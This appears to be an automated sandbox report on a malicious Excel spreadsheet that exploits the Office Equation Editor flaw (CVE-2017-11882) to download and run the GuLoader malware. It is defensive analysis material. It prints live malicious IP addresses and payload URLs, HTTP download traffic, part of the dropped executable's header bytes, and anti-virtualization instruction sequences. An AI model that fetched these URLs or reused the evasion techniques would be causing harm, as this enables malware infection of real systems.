Play interactive tour

Edit tour

Windows Analysis Report Exhibitions Order Detailed list.xlsx

Overview

General Information

Sample Name:	Exhibitions Order Detailed list.xlsx
Analysis ID:	457915
MD5:	c8e623590aae92259642c8c80f761493
SHA1:	877da933e035b90f881d2c7ef3fa37f9065b6aa7
SHA256:	257645cd8e215cd4f9c2c153f3605e7389a2aed04a870a1aa0b4a4d9aa5762b3
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Drops PE files to the user root directory

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2696 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 1980 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2364 cmdline: 'C:\Users\Public\vbc.exe' MD5: 27BF14807BC9D5CD2D823293F43C3A3A)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://101.99.94.119/WEALTH_PRUu"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 198.12.91.134, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1980, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1980, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1980, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2364

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://198.12.91.134/win/vbc.exe

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_PRUu"}

Multi AV Scanner detection for domain / URL

Show sources

Source: http://198.12.91.134/win/vbc.exe

Virustotal: Detection: 17%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Virustotal: Detection: 21%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 10%
Source: C:\Users\Public\vbc.exe	Virustotal: Detection: 21%	Perma Link
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 10%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.12.91.134:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.12.91.134:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 68MB

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://101.99.94.119/WEALTH_PRUu

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 02 Aug 2021 12:50:18 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Mon, 02 Aug 2021 10:45:08 GMTETag: "1c000-5c891434c93da"Accept-Ranges: bytesContent-Length: 114688Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c3 1c 80 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 40 01 00 00 80 00 00 00 00 00 00 44 11 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 01 00 00 10 00 00 e1 60 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 4b 01 00 28 00 00 00 00 70 01 00 96 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 3d 01 00 00 10 00 00 00 40 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 5c 11 00 00 00 50 01 00 00 10 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 96 5b 00 00 00 70 01 00 00 60 00 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View

IP Address: 198.12.91.134 198.12.91.134

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: global traffic

HTTP traffic detected: GET /win/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.91.134Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEC2566A.emf

Jump to behavior

Source: global traffic

Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: BEC2566A.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5968 NtAllocateVirtualMemory,		6_2_003B5968
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5A62 NtAllocateVirtualMemory,		6_2_003B5A62

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5968	6_2_003B5968
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B40B7	6_2_003B40B7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0211	6_2_003B0211
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4339	6_2_003B4339
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B443A	6_2_003B443A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B94D8	6_2_003B94D8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B853B	6_2_003B853B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B05A1	6_2_003B05A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B85E7	6_2_003B85E7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B95C6	6_2_003B95C6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B86F4	6_2_003B86F4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B86DB	6_2_003B86DB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5781	6_2_003B5781
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8802	6_2_003B8802
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2873	6_2_003B2873
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B891F	6_2_003B891F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B1900	6_2_003B1900
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7A7A	6_2_003B7A7A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2A77	6_2_003B2A77
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5A62	6_2_003B5A62
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0B59	6_2_003B0B59
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3BFF	6_2_003B3BFF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0BDC	6_2_003B0BDC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8C2C	6_2_003B8C2C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0CFA	6_2_003B0CFA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3CF2	6_2_003B3CF2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3CEF	6_2_003B3CEF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2D3B	6_2_003B2D3B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5D78	6_2_003B5D78
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4DB6	6_2_003B4DB6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B1DA0	6_2_003B1DA0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0DD5	6_2_003B0DD5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7E5C	6_2_003B7E5C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B1E99	6_2_003B1E99
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0ED2	6_2_003B0ED2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2FD3	6_2_003B2FD3

Source: vbc[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/19@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Exhibitions Order Detailed list.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD539.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Exhibitions Order Detailed list.xlsx

Static file information: File size 1239040 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408873 push esp; ret	6_2_00408877
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004088C0 push esp; ret	6_2_004088CB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004014E9 push es; ret	6_2_004014EA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408CB2 push esi; ret	6_2_00408CB3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040891C push esi; retf	6_2_0040892F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00407D36 pushad ; iretd	6_2_00407D3B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408672 push esi; ret	6_2_00408677
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00407E22 push ds; iretd	6_2_00407E27
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408624 push esp; ret	6_2_00408627
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408ADE push esi; retf	6_2_00408ADF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408695 push esi; ret	6_2_00408677
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B6625 push ebp; iretd	6_2_003B6637

Source: initial sample	Static PE information: section name: .text entropy: 7.07266809617
Source: initial sample	Static PE information: section name: .text entropy: 7.07266809617

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0B59	6_2_003B0B59
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0BDC	6_2_003B0BDC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0CFA	6_2_003B0CFA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2D3B	6_2_003B2D3B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0DD5	6_2_003B0DD5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2FD3	6_2_003B2FD3

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B0298 second address: 00000000003B0298 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B7EAD second address: 00000000003B7EAD instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B9858 second address: 00000000003B9858 instructions:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B0298 second address: 00000000003B0298 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B7EAD second address: 00000000003B7EAD instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B9858 second address: 00000000003B9858 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B7CB5 second address: 00000000003B7CB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 8D6257E7h 0x00000007 xor eax, D6E50CE5h 0x0000000c xor eax, CD304DCCh 0x00000011 add eax, 6948E933h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F1684EA0E03h 0x0000001e lfence 0x00000021 mov edx, 617AD252h 0x00000026 xor edx, 84973C64h 0x0000002c xor edx, 903C3D1Eh 0x00000032 xor edx, 0A2FD33Ch 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d cmp edx, 53D52FB7h 0x00000043 cmp ah, ch 0x00000045 test cl, bl 0x00000047 ret 0x00000048 jmp 00007F1684EA0DF9h 0x0000004d cmp ch, dh 0x0000004f sub edx, esi 0x00000051 ret 0x00000052 add edi, edx 0x00000054 dec dword ptr [ebp+000000F8h] 0x0000005a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000061 jne 00007F1684EA0CFCh 0x00000063 call 00007F1684EA0D57h 0x00000068 call 00007F1684EA0E24h 0x0000006d lfence 0x00000070 mov edx, 617AD252h 0x00000075 xor edx, 84973C64h 0x0000007b xor edx, 903C3D1Eh 